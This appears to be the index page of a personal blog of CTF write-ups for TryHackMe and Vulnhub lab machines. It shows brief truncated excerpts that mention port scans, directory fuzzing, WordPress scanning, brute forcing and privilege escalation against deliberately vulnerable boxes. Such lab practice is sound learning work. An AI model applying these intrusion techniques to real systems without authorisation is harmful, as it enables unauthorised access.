toc2 It’s a setup… Can you get the flags in time?. This is toc2 from THM. It’s medium rated. I mostly want to talk about the privesc, because I hadn’t seen it before. Foothold Just a quick note on this; we were given some database credentials and allowed to install...
Vulnhub: OS-HACKNOS-3
OS-HACKNOS-3 Difficulty: Intermediate This is OS-HACKNOS-3 from Vulnhub. Ports SSH and HTTP only. Web At the website, some dirsearch works reveals two different webapps. We’ve got Gila CMS running at http://hacknos/websec/, and OSTicket running at http://hacknos/devil/. I try brute forcing both login pages but both have brute force prevention turned...
THM: Archangel
Archangel A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it. This is Archangel from THM. It’s easy rated, but I would say it’s not the easiest easy. This writeup is a bit half-hearted, but it captures the important...
THM: Keldagrim
Keldagrim The dwarves are hiding their gold! This is Keldagrim from THM. It’s medium rated and I liked it a lot. Ports SSH and HTTP; that’s it. We don’t use SSH, this is 100% web. HTTP It’s a pretty simple website, about selling gold in Runescape and other MMOs (I...
Vulnhub: Symfonos 1
Symfonos 1 Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell. This box is on the NetSecFocus Admin list of OSCP-like machines. It’s SYMFONOS: 1 from Vulnhub. I did not complete it without hints; nothing like getting humbled by a ‘beginner’ box...
THM: Madeye's Castle
Madeye’s Castle A boot2root box that is modified from a box used in CuCTF by the team at Runcode.ninja This is Madeye’s Castle from THM. It’s medium rated and came out earlier today. Ports SSH, HTTP on Port 80 and SMB (139/445) are our open ports. SMB We have anonymous...
THM: Bebop
Bebop Who thought making a flying shell was a good idea? This is Bebop from THM. It’s easy rated and is supposed to be about taking over a drone or something. Ports SSH and Telnet on port 23. Telnet We were given a password: pilot. Let’s try it? root@kali:/opt/tryhackme/bebop# telnet...
THM: Linux Agency
Game Zone This Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as its gonna be a tough ride. This is Linux Agency from THM. It doesn’t seem to have...
Vulnhub: INCLUSIVENESS: 1
Sustah Inclusiveness is an intermediate boot to root VM to practice your hacking skills. Can you get in? This is INCLUSIVENESS: 1 from Vulnhub. The creator described it as intermediate. Let’s go. Ports FTP, SSH and HTTP. FTP Anonymous login with upload enabled, what’s not to love? Doesn’t help yet...
THM: Game Zone
Game Zone Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root! This is Game Zone from THM. It’s easy rated and effectively a walk through. I won’t say much about it. Privesc...
THM: Sustah
Sustah Play a game to gain access to a vulnerable CMS. Can you beat the odds? This is Sustah from THM. It’s medium rated. We have another ‘hint’: The developers have added anti-cheat measures to their game. Are you able to defeat the restrictions to gain access to their internal...
THM: Cyborg
Cyborg A box involving encrypted archives, source code analysis and more. This is Cyborg from THM. It’s easy rated. I’ve been fighting Sustah but stonewalling, so let’s try this one. Ports SSH and HTTP only. HTTP The front page is the Apache default page, so it’s dirsearch to the rescue:...
THM: Skynet
battery A vulnerable Terminator themed Linux machine. This is Skynet from THM. It’s easy rated, subscriber only and part of the ‘Offensive Pentesting’ learning path. I’ve decided to subscribe; I’ll just try one month at this stage and see if I like it. Ports We’ve got a few ports: PORT...
THM: Battery
battery Electricity bill portal has been hacked many times in the past , so we have fired one of the employee from the security team , As a new recruit you need to work like a hacker to find the loop holes in the portal and gain root access to...
THM: Chocolate Factory
Chocolate Factory This room was designed so that hackers can revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa This is a beginner friendly room! This is Chocolate Factory from THM. It’s easy rated, although it’s not the noobiest one I’ve ever seen. Ports Wew, lots - there are...
THM: Nax
Overpass3 Identify the critical security flaw in the most powerful and trusted network monitoring software on the market, that allows an user authenticated execute remote code execution. This is Nax from THM. It’s medium rated and somewhat guided. Ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open...
THM: Overpass 3 - Hosting
Overpass3 You know them, you love them, your favourite group of broke computer science students have another business venture! Show them that they probably should hire someone for security… This is Overpass 3 - Hosting from THM. It’s medium rated. I add overpass3 to /etc/hosts. Ports We’ve got FTP, SSH...
THM: ColddBox: Easy
Jacob the Boss An easy level machine with multiple ways to escalate privileges. This is ColddBox from THM. Ports HTTP on port 80 and SSH hiding away on port 4512. We won’t need it anyway. HTTP What’s that - did someone say Wordpress? root@kali:/opt/tryhackme/colddbox# wpscan -e --url http://10.10.0.137 Gets 3...
Babby's first VM
First VM This is just a really quick note. I didn’t do any practice yesterday because I made my first VM instead. It’s pretty basic but I’m happy with how it turned out so I’ve reached out to Vulnhub about submitting it, so we’ll see what happens there. I don’t...
THM: Jacob & KOTH May 2020
Jacob the Boss Find a way in and learn a little more. First of all, add the jacobtheboss.box address to your hosts file This is Jacob the Boss from THM. Ports Quite a few here: PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 1090/tcp open ff-fms...
THM: Thompson
Introduction boot2root machine for FIT and bsides guatemala CTF This is Thompson from THM. It’s the last one of the bsides guatemala boxes. This one took me 13 minutes. I’m on a roll. Ports SSH and an HTTP proxy on port 8080. We’ve got a picture of Tomcat, so it’s...
THM: Anonforce
Introduction boot2root machine for FIT and bsides guatemala CTF This is Anonforce from THM. Like Dav and Library, it’s ranked easy. This box took me about 12 minutes. Ports FTP and SSH only, on the standard ports. FTP We’ve got anonymous login so let’s use it; we get the root...
THM: Library
Introduction boot2root machine for FIT and bsides guatemala CTF This is Library from THM. Like Dav, this one is ranked easy and doesn’t give any hints as to what it’s about. I’ve been away at the beach for a few days hence no hacking. In fact, these were the first...
THM: Dav
Introduction boot2root machine for FIT and bsides guatemala CTF This is Dav from THM. This one is ranked as easy and doesn’t give much in the way of hints as to what it’s about. Ports HTTP only; makes it simple. HTTP Running a basic gobuster turns up a single page:...
THM: All In One
Introduction This box’s intention is to help you practice several ways in exploiting a system. There is few intended paths to exploit it and few unintended paths to get root. Try to discover and exploit them all. Do not just exploit it using intended paths, hack like a pro and...
Vulnhub - GANANA: 1
Introduction This is a fairly simple machine rated easy to intermediate. There is only one flag to capture root.txt. This is Ganana: 1 from vulnhub. Ports We have three open ports, and SSH is closed: 22/tcp closed ssh 80/tcp open http 443/tcp open https 6777/tcp open ntz-tracker Although this says...
Vulnhub - DIGITALWORLD.LOCAL: MERCY V2
Introduction MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-) MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box. Note:...
Vulnhub - TIKI: 1
Introduction Oh no our webserver got compromised. The attacker used an 0day, so we dont know how he got into the admin panel. Investigate that. This is an OSCP Prep Box, its based on a CVE I recently found. Its on the OSCP lab machines level. This box is on...
Vulnhub - CALLME: 1
Introduction Machine name: Callme Level: Easy flags: user, root Description: This is a Linux box with a custom remote access This is CALLME: 1 from Vulnhub. I did the foothold/user part of this myself, and then checked a writeup for the privesc. Which I didn’t successfully run; whatever. Ports 22/tcp...
Vulnhub - ODIN: 1
Introduction Difficulty: Easy Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from it, asked him to sacrifice his left eye, this being a symbol of his...
Vulnhub - Y0USEF: 1
Introduction Get two flag Difficulty : easy This is Y0USEF: 1 from Vulnhub. I’ve been so fricking busy lately. Ports SSH and HTTP only. HTTP The front page just says it’s under construction so it’s off fuzzing we must go. The directory we want is mis-spelled - I assume deliberately...
Vulnhub - HOGWARTS: BELLATRIX
Introduction The evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as … Find out and tell the Minister of Magic Difficult: Medium This works better in VirtualBox Hints –> Brute force is not necessary, unless it is required. ncat is the key ;) This is HOGWARTS: BELLATRIX...
Vulnhub - INO: 1
Introduction Level: Easy flags: user, root Description: This machine require a low skill to get user flag, a little more skill to escalate to root! Author: foxlox This is INO: 1 from Vulnhub. Ports SSH, SMTP (25) and HTTP. HTTP Well, this webserver hated me. Because it’s running fail2ban. Basically...
Vulnhub - INFERNO: 1
Introduction Real Life machine vs CTF. Midway upon the journey of our life I found myself within a forest dark, For the straightforward pathway had been lost. Ah me! how hard a thing it is to say What was this forest savage, rough, and stern, Which in the very thought...
THM Advent of Cyber 2020
Introduction Get started with Cyber Security in 25 Days - Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas. This is Advent of Cyber 2 from TryHackMe. This is basically a meta post. I joined TryHackMe 242 days ago today; that must’ve...
THM: Bookstore
Introduction A Beginner level box with basic web enumeration and REST API Fuzzing. This is Bookstore from TryHackMe. The description implies it’s easy, but it’s medium rated which I think is a rating given by the THM testing crew. Ports We’ve got SSH, HTTP and port 5000, which is: 5000/tcp...
A couple of unsatisfying endeavours
Part The First This boot2root machine is realistic without any CTF elements and pretty straight forward. Goal: Hack your University and get root access to the server. To successfully complete the challenge you need to get user and root flags. Difficulty: Easy / Beginner Level This is VULNUNI: 1.0.1 from...
THM: Chill Hack
Introduction Chill the Hack out of the Machine. Intermediate level CTF. Capture the flags and have fun! This is Chill Hack from TryHackMe. It’s medium rated. Ports We’ve got FTP, SSH and HTTP on port 80. FTP Anonymous login is permitted, and there is a note.txt that gives some message...
Vulnhub - LOLY: 1
Introduction Difficulty: Easy Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). This is LOLY: 1 from Vulnhub. Ports We’ve got one port only - HTTP on Port 80. Wordpress Really the only thing...
THM: Revenge
Introduction You’ve been hired by Billy Joel to get revenge on Ducky Inc…the company that fired him. Can you break into the server and complete your mission? This is Revenge from TryHackMe. It’s medium rated. Cut to the chase I’m going to skip over a lot of this. Foothold is...
Vulnhub - W34KN3SS: 1
Introduction The matrix is controlling this machine, neo is trying to escape from it and take back the control on it , your goal is to help neo to gain access as a “root” to this machine , through this machine you will need to perform a hard enumration on...
Vulnhub - M87: 1
Introduction m87 is a simple machine, created specifically to be exploited. Don’t get discouraged and always Try Harder! This is M87: 1 from Vulnhub. Ports We’ve got 3 ports - SSH on 22, HTTP on 80 and something on port 9090, but SSH is filtered so it doesn’t count. What’s...
Vulnhub - KIRA: CTF - more like WTF, amirite?
Introduction This box has no description or explanation. Okey dokey. This is KIRA: CTF from Vulnhub. Ports Well, we always run nmap right? Lol no. This box has autologon enabled! I start it up and it immediately logs on as bassam with the full Ubuntu GUI experience. Who cares what...
Vulnhub - WARZONE: 2
Introduction Enumeration, Flask, Port Forwarding, GTFObins Created and Tested in Virtual box (NAT network) Hint : lowercase letters This is WARZONE: 2 from Vulnhub. Ports We’ve got 3 ports - FTP, SSH and 1337. What’s 1337? nmap doesn’t give us much, so let’s netcat it: root@kali:/opt/vulnhub/warzone2# nc 192.168.1.144 1337 #...
Vulnhub - HOGWARTS: DOBBY
Introduction dobby needs to be root to help harry potter, dobby needs to be a free elf Difficult: Easy This works better in VirtualBox This is HOGWARTS: DOBBY from Vulnhub. Ports HTTP only; makes targeting easier. HTTP and Rabbits This one has a few rabbitholes, or at least red herrings....
Vulnhub - HEMISPHERE: GEMINI
Prelude Since my last post I did Brute It on THM and more or less finished TommyBoy from Vulnhub, although I had to consult a write-up for a hint or two on that one. I did most of it myself. I probably won’t write a post about it. Introduction Difficulty:...
THM: Startup
Introduction We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (incase you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and...
Vulnhub - ELECTION: 1
Introduction It is an OSCP-like VM, Medium Level difficulty. This is eLection: 1 from Vulnhub. Ports SSH and HTTP only; simple. HTTP robots.txt has four disallowed entries: admin wordpress user, and election 1 through 3 actually don’t exist, but election does. It’s a Web Based Election System from tripath. Searchsploit...
THM: The Server From Hell
Introduction Face a server that feels as if it was configured and deployed by Satan himself. Can you escalate to root?. This is The Server from Hell from TryHackMe. The only instruction says: Start at port 1337 and enumerate your way. I started an nmap scan but there was port...
THM: Undiscovered
Introduction Discovery consists not in seeking new landscapes, but in having new eyes. This is Undiscovered from TryHackMe. Interestingly, this actually was a Vulnhub machine for a while then got moved to THM. I found the foothold and figured out the privesc, but didn’t know how to do the lateral...
Vulnhub - DEV: 1
Introduction Easy level Linux box. This box “dev” aims to educate people on common and misconfigurations of a widely used developer tool. Use a good wordlist! This is DEV: 1 from vulnhub. Ports We have two ports only, SSH and HTTP on the standard port 80. HTTP We’ve got a...
Vulnhub - CHEESEY: CHEESEYJACK
Introduction Cheeseyjack aims to be an easy to medium level real-world-like box. Everything on this box is designed to make sense, and possibly teach you something. Enumeration will be key when attacking this machine. Hint: A cewl tool can help you get past a login page. This is CHEESEY: CHEESEYJACK...
Vulnhub - FishyMail: 1
Introduction This is my first vulnerable virtual machine called fishymail. You can download it here load the .vdi up on VirtualBox and give it a try. This is FishyMail: 1 from vulnhub. Setup This box is provided as a virtual disk image, not as a full VM. So you have...
Vulnhub - COLDDBOX: EASY
Introduction Welcome to ColddBox Easy, it is a Wordpress machine with an easy level of difficulty, highly recommended for beginners in the field, good luck! Please share your feedback: “https://twitter.com/C0ldd__” This is ColddBox: Easy from vulnhub. Last one before bedtime - this will be brief. Ports This box just has...
Vulnhub - KB-VULN: 3
Introduction This machine is the kind that will measure your research ability. This VM is running on VirtualBox. It includes 2 flags:user.txt and root.txt. This is KB-VULN: 3 from vulnhub. After doing Tenderfoot I rolled straight into this one and knocked it over too. Ports This box has: 22/tcp open...
Vulnhub - TENDERFOOT: 1
Introduction A very Easy Box for beginners, I recommend this box if you are new here. Your task is to grab all the 3 flags (user1.txt, user2.txt, proof.txt). This is TENDERFOOT: 1 from vulnhub. After banging my head on a few others, I thought I’d run through an easy box...
Vulnhub - SUNSET: MIDNIGHT
Introduction Difficulty: Intermediate Important!: Before auditing this machine make sure you add the host “sunset-midnight” to your /etc/hosts file, otherwise it may not work as expected. This is SUNSET: MIDNIGHT from vulnhub. Ports This box has: SSH on port 22, HTTP on port 80, and MariaDB (MySQL) on 3306. HTTP...
Vulnhub - THE PLANETS: MERCURY
Introduction Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This is THE PLANETS: MERCURY from vulnhub. Ports This box has SSH on port 22, and HTTP on port 8080. The nmap detail...
Vulnhub - DERPNSTINK: 1
Introduction Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live… This box is on the NetSecFocus Admin...
Vulnhub - BOB: 1.0.1
Introduction Difficulty: Beginner/Intermediate Bob is my first CTF VM that I have ever made so be easy on me if it’s not perfect. The Milburg Highschool Server has just been attacked, the IT staff have taken down their windows server and are now setting up a linux server running Debian....
Vulnhub - Toppo: 1
Introduction The Machine isn’t hard to own and don’t require advanced exploitation . Level : Beginner DHCP : activated Inside the zip you will find a vmdk file , and I think you will be able to use it with any usual virtualization software ( tested with Virtualbox) This box...
Vulnhub - SAR: 1
Introduction Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing. This box is on the NetSecFocus Admin list of OSCP-like machines. It’s SAR: 1 from vulnhub. Ports HTTP on port 80 only. This already makes things easy because you know that you’ll...
Vulnhub - NULLBYTE: 1
Introduction Objetcive: Get to /root/proof.txt and follow the instructions. Level: Basic to intermediate. Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware. Hints: Use your lateral thinking skills, maybe you’ll need to write some code. This box is on the NetSecFocus Admin list of OSCP-like machines. It’s...
Vulnhub - EVM: 1
Introduction This is super friendly box intended for Beginner’s This may work better with VirtualBox than VMware – note: some of the spelling and punctuation errors on this blog are mine; but if I quoted something (like above), I tend to quote it verbatim, even if I know it’s incorrect....
Vulnhub - LemonSqueezy: 1
Introduction This is a beginner boot2root in a similar style to ones I personally enjoy like Mr Robot, Lazysysadmin and MERCY. This is a VMware machine. DHCP is enabled, add lemonsqueezy to your hosts. It’s easypeasy! This box is on the NetSecFocus Admin list of OSCP-like machines. It’s LEMONSQUEEZY: 1...
Vulnhub - DEVCONTAINER: 1
Introduction Goal: 2 flagas Difficulty: Easy-intermediate Well, not much to go on here. The box is DEVCONTAINER: 1 from vulnhub. Ports We’ve got one port only; HTTP on 80. HTTP So with a quick gobuster fishing expedition we find an upload directory: http://192.168.1.97/upload/ And it contains the text: Allowed file...
THM - Develpy
Introduction boot2root machine for FIT and bsides Guatemala CTF. Not much to go on here. This one is Medium rated. Let’s begin. Ports Nmap says we’ve got two ports only - SSH on 22 and a mystery port on 10000. Visiting port 10000 in Firefox presents the following message: Private...
Vulnhub - Funbox2: Rookie
Introduction Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first I went away again for a few days; this time with the family - so that was...
Vulnhub - Funbox: Next Level
Introduction Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! No updates for a few days; I was away for work for a bit and I’ve been partway through a few things - but now I’ve completed Funbox: Next Level. Here’s how. Ports...
Vulnhub - KB-VULN:2 and EasyEnum
Introduction Two easy boxes rooted; let’s go. KB-VULN: 2 Funbox: EasyEnum KB-VULN2 ports We’ve got a few: FTP, SSH on 22, HTTP on 80 and SMB. We’ve got no anonymous access to FTP; let’s ignore that. We have login to a share on SMB called ‘Anonymous’ and from that we...
Vulnhub - Cewlkid: 1
Introduction An intermediate boot2root. The name is a hint. The start is CTF but the end is real world and worth the effort. Created in Virtualbox. Goal: Get the root flag. Real world eh? Sounds interesting. Let’s see what we’ve got… Ports We’ve got SSH and two HTTP ports: 80...
Choosing your battles
Not fair My write-up for Madness on TryHackMe was critical of the box (or room, to use their preferred terminology), because of the nature of part of the challenge. I haven’t changed my mind about how I feel about it personally, but the criticism was probably a bit unfair. Someone...
Downunder CTF
Introduction What is DownUnderCTF? DownUnderCTF is a world-wide Capture The Flag (CTF) competition targeted at Australian High School and University Students. This ran over the weekend. I had a go at it when I had some spare time, and I did…okay I guess. I finished 118th out of 1080 teams...
Vulnhub - Potato: 1
Introduction Difficulty: Easy to Medium Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). This is another box from the same people who made Chili and Cherry, but it’s rated easy to medium rather...
Vulnhub - Cherry: 1
Introduction Difficulty: Easy Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). This is another easy rated box from the same people who made Chili. nmap This time we get four ports: 22/tcp open...
Vulnhub - Chili: 1
Introduction Difficulty: Easy Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). Okay then, let’s go. nmap All we’ve got is FTP and HTTP on port 80; nothing else. Nothing on the top 1000...
THM - RootMe with a twist
Introduction A ctf for beginners, can you root me? I’ve thought a few times that maybe I could do a THM room entirely on my phone. Not because I had to, but for the additional challenge. If you’ve ever seen Mitten Squad on YouTube you might get the idea. Today...
Vulnhub & THM notes
Introduction I’ve recently completed NULLY CYBERSECURITY: 1 and ONSYSTEM: SHELLDREDD #1 HANNAH from Vulnhub and Poster from TryHackMe. These are some brief thoughts about each one. Nully This was great; I really enjoyed it. I will probably write it up separately. But essentially it’s three separate servers/services (Mail, Web and...
THM - Ghizer
Introduction lucrecia has installed multiple web applications on the server. Okay, good to know. This one is Medium rated. Let’s begin. Ports Nmap says we’ve got these ports: 21/tcp open ftp 80/tcp open http 443/tcp open https 18002/tcp open unknown 35767/tcp open unknown 38959/tcp open unknown A more detailed scan...
Testing, testing
Here, or meta? Really this is a test to see if I can write a blog post on my phone with Joplin and then push it to my github repo using termux. If this goes online, it worked. Also, I did the new THM machine Game Server. It was pretty...
THM - Kiba
Introduction Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution. Alrighty; easy rated. Nmap We’ve got four ports: SSH on 22 and HTTP on 80, plus two mystery ports in 5044 and 5601. Port 80 There’s nothing much on the front page on...
Vulnhub - dc6
Introduction DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to get root and to read the one and only flag....
Vulnhub - sunset:twilight
Introduction Easy/Intermediate (May variate depending on your background) It is recommended to run this machine in Virtualbox. This works better with VirtualBox rather than VMware Okay let’s see what we can do with this. VMWare vs VirtualBox I run Kali in VMWare but I do have VirtualBox too. I downloaded...
Vulnhub - Photographer
Introduction This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt. File. Not zipped strangely, so it’s a 2.6Gb download as an ova file. Nmap We’ve got four ports: SMB (139/445), HTTP on 80 and...
THM - Jack of All Trades
Introduction Boot-to-root originally designed for Securi-Tay 2020. Jack is a man of a great many talents. The zoo has employed him to capture the penguins due to his years of penguin-wrangling experience, but all is not as it seems… We must stop him! Can you see through his facade of...
THM - Bolt
Introduction This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. Okey dokey then. It’s easy rated. Let’s begin. Ports nmap says we’ve got three ports: 22 (SSH) and 80 (HTTP) and 8000. One of the...
THM - Gotta Catch 'em All
Introduction This room is based on the original Pokemon series. Can you obtain all the Pokemon in this room? Sure, why not. It’s easy rated. Let’s begin. Ports nmap says we’ve got two ports only: 22 (SSH) and 80 (HTTP). Webserver The front page is basically just the default Apache...
THM - Willow
Introduction What lies under the Willow Tree? This one is Medium rated with no hints. Let’s begin. Ports nmap says we’ve got four ports: 22 (SSH), 80 (HTTP), 111 (RPCBind) and 2049 (NFS). So that’s interesting. NFS Let’s go check out the NFS share. mkdir mountpoint mount -t nfs 10.10.226.215:/...
THM - Wegl
Introduction Can you exfiltrate the root flag? Dunno, but since this is a easy rated box I give myself a fighting chance. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only. Webserver The homepage for the website is just the Apache default page, with one exception...
THM - Easy Peasy
Introduction Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob. This is a easy rated box and I did it, but I can’t be bothered with writing it up. Here’s...
THM - Smag Grotto
Introduction Do you remember how to analyse packets? This is a easy rated box. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only. Webserver There’s not much on the home page for the website, so we’ll run a quick gobuster: root@kali:/opt/tryhackme/smag# gobuster dir -u http://10.10.184.160 -w...
THM - CMesS
Introduction Can you root this Gila CMS box? This is a medium rated box, and we already know it runs Gila CMS from the title. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only; web all the way? Webserver Checking searchsploit before doing much else, we...
THM - Madness
Introduction Will you be consumed by Madness? This is a easy rated box. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only. Webserver To start with, this appears to be simply the Apache default page. But hidden away is a comment: <img src="thm.jpg" class="floating_element"/> <!-- They...
THM - Brooklyn NineNine
Introduction This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box. Per the description, this is a beginner box. Sometimes I battle for hours on these easy rated boxes overlooking something simple or hunting...
THM - Year of the Rabbit
Introduction Can you hack into the Year of the Rabbit box without falling down a hole? This is an easy rated box, and I’m a bit concerned that it’s an easy exploit hidden behind some annoyingly difficult to find folder on a website; we’ll see if that’s true. nmap So...
THM - Dogcat
Introduction I made this website for viewing cat and dog images with PHP. If you’re feeling down, come look at some dogs/cats! This is a medium rated box, and right up front I’ll say that I had to look up some hints for it. Let’s begin. Webserver The page description...
THM - Ignite
Introduction A new start-up has a few issues with their web server. This is another easy rated box. Let’s begin. Ports nmap says we’ve got 80 (HTTP); I originally cancelled this scan about 60% in since it was running slowly. Later I ran it again in case there was something...
THM - Billy Joel blog.
Introduction Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome! Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get...
THM - Anonymous
Introduction Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods. This is a medium rated box, although the description suggests it...
THM - Python Playground
Introduction Be creative! Jump in and grab those flags! They can all be found in the usual places. This is a hard rated box, and so far I haven’t completed it fully. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only, and TTL says it’s Linux. A detail...
THM - Source
Introduction Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool. So we’ve got a pretty big hint already. This box is rated Easy. Ports nmap says we’ve got 22 (SSH) and 10000 only; Webmin typically runs on port 10000. Lets get some more details though. Port Scan...
THM - Wonderland
Introduction Enter Wonderland and capture the flags. This is a medium ranked ‘Alice in Wonderland’ themed box. Let’s begin. Ports nmap says we’ve got 22 (SSH) and 80 (HTTP) only. Webserver Follow the White Rabbit. “Curiouser and curiouser!” cried Alice (she was so much surprised, that for the moment she...
THM - Mindgames
WARNING This post contains rude words, and it’s not my fault. Turn back now. Introduction No hints. Hack it. Don’t give up if you get stuck, enumerate harder. This machine is ranked hard, we’ll see if I’m up to it… Ports nmap says we’ve got 22 (SSH) and 80 (HTTP)...
THM - Boiler
Introduction Intermediate level CTF. Just enumerate, you’ll get there. Welp, let’s see if that’s true. Ports nmap says we’ve got 21 (FTP), 80 (HTTP), 10000 and 55007. Port 10000 is Webmin, and 55007 is SSH. Webmin is a web-based system configuration tool for Unix-like systems. Having SSH running on port...
THM - Haskhell
Introduction Show your professor that his PhD isn’t in security. Not much to go on there. Haskell is a programming language that I don’t know anything about. Let’s go! Ports nmap says we’ve got 22 (SSH) and 5001, which is a non-standard port. 5001/tcp open http syn-ack ttl 63 Gunicorn...
THM - Cage
Introduction Help Cage bring back his acting career and investigate the nefarious goings on of his agent! Hmmmm. Sounds cheesy. Ports nmap says we’ve got 21 (FTP), 22 (SSH) and 80 (HTTP) only. FTP FTP allows anonymous login and there is one file, called dad_tasks. Downloading it and opening it...
THM Vulniversity
Introduction So according to a post I saw on Medium, this is one of a series of OSCP like rooms on THM. I’ll give it a go. Open Ports I’ve got ports 21 (FTP), 22 (SSH), 139 + 445 (SMB), so maybe this is a Windows box. I also have...
THM Lian_Yu
Introduction Welcome to Lian_YU, this Arrowverse themed beginner CTF box! Capture the flags and have fun. Normally I keep notes in Cherrytree. I’m going to try doing notes directly into Joplin as I work instead for this. nmap root@kali:/opt/tryhackme/lian_yu# nmap -p- -T4 10.10.156.179 -oA tcp_all_ports -vv Results Ports 21 (FTP),...
TryHackMe - AgentSudo
Rules hackthebox.eu has a separation between ‘active’ and ‘retired’ machines; it’s against the rules to publish a write-up on an active machine. I’ve only recently started with tryhackme.com, which is a little different. There isn’t a distinction between active and retired machines, and as far as I can tell, there...